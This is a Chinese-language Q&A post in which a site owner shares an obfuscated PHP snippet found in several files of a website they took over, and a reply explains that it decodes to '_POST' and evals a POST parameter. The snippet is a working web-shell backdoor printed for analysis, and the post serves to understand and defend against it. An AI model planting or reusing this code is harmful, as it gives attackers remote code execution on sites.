最近接管一个网站,在多个文件中发现以下代码,认为是恶意代码:
<?php
$qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q1134e5'])){eval(${$s20}['q1134e5']);}
?>
关于它的作用有什么想法吗?
它似乎:
- 第一行是“_POST”;
- 第二行检查 _POST 是否有效,然后从帖子中获取参数“q1134e5”并执行它。
了解为什么它很危险http://php.net/manual/en/function.eval.php http://php.net/manual/en/function.eval.php
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)